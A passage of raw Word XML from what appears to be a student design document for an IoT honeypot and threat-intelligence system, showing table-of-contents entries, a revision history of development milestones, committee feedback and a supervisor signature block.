              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69048" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Default-Credential Compromise and Credential Stuffing</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69048 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">79</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69049" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Alert Notification (Threshold, De-duplication, Escalation)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69049 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">80</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69050" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">8.4 Integration Testing</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69050 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">82</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69051" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">8.5 Test Summary and Security Analysis</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69051 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">85</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9111" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">8.6 Acceptance Tests of the 70% Build (v0.7)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9111 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">85</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3B8EF9B8" w14:textId="08667B4C" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="770EE4C0" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00634EF6" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116AA2F2" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F9E7DE" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08411435" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B0DF97" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="_Toc119920743"/>
      <w:bookmarkStart w:id="7" w:name="_Toc229436409"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Revision History</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="4954"/>
        <w:gridCol w:w="1584"/>
      </w:tblGrid>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="0AB1456F" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="737E6F61" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5483E009" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6236A697" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Reason for changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65A1C938" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="05BB82CA" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abdul Wadood, Abdul Rahman</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">12-May-2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Initial SDS: design methodology, architecture, design models, data design and the first implementation increment (SSH, Telnet, HTTP and MQTT honeypots, SQLite logging, attack detector) with its testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="5F702734" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abdul Wadood, Abdul Rahman</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">12-Oct-2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Updated for the 60% evaluation: RTSP honeypot, unified PostgreSQL event store, Redis Device State Manager, high-interaction fake shell, Threat Intelligence Engine (rules, MITRE ATT&amp;CK, GeoIP, correlation, IOCs), Telegram/e-mail alerts, new SOC dashboard, hardened deployment; all chapters and tests revised.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="5F702734" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abdul Wadood, Abdul Rahman</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">16-Oct-2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Updated for the 70% evaluation (code v0.7): fixes for the defects found in the 60% review; malware capture with YARA; STIX 2.1 export and PDF threat reports; React/TypeScript dashboard with WebSocket live push; automatic firewall service, backups and monitoring; Module 8 dataset. Added nine activity diagrams (Section 4.2), new deployment and ER diagrams, new dashboard screenshots and the 70% acceptance tests (Section 8.6).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C9CDDD0" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F6724A" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="018B794C" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB9081D" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B792084" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00634EF6" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc119920744"/>
      <w:bookmarkStart w:id="9" w:name="_Toc229436410"/>
      <w:r>
        <w:t>Application Evaluation History</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="70E16767" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9738" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4954"/>
        <w:gridCol w:w="4784"/>
      </w:tblGrid>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="018CBFC3" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1248D993" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Comments (by committee)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FCF9953" w14:textId="72DABB74" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">*Include the ones given at scope time both in doc and presentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A39AC1E" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Action Taken</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Integrate AI/ML with the system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI/ML classifier for the attack patterns (Module 8, 100% milestone)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="4610D573" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The scope is too wide and make it concise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Made the scope concise with three devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ED98023" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49156CA5" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F5DD0B" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542DC670" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B228F8D" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E9FE65" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D1515D" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072B538D" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2430F7E1" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A23A4C" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA33AFE" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001B03C2" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276BE905" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D7197D" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F9D33C" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Supervised by </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02298456" w14:textId="3D7AF7C1" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="00C05C1F" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Mrs. Sara Ali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC67B10" w14:textId="255686AC" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="ByLine"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:sectPr w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidSect="005C6601">
          <w:headerReference w:type="default" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Signature______</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62399E14" wp14:editId="75C1C2AE">
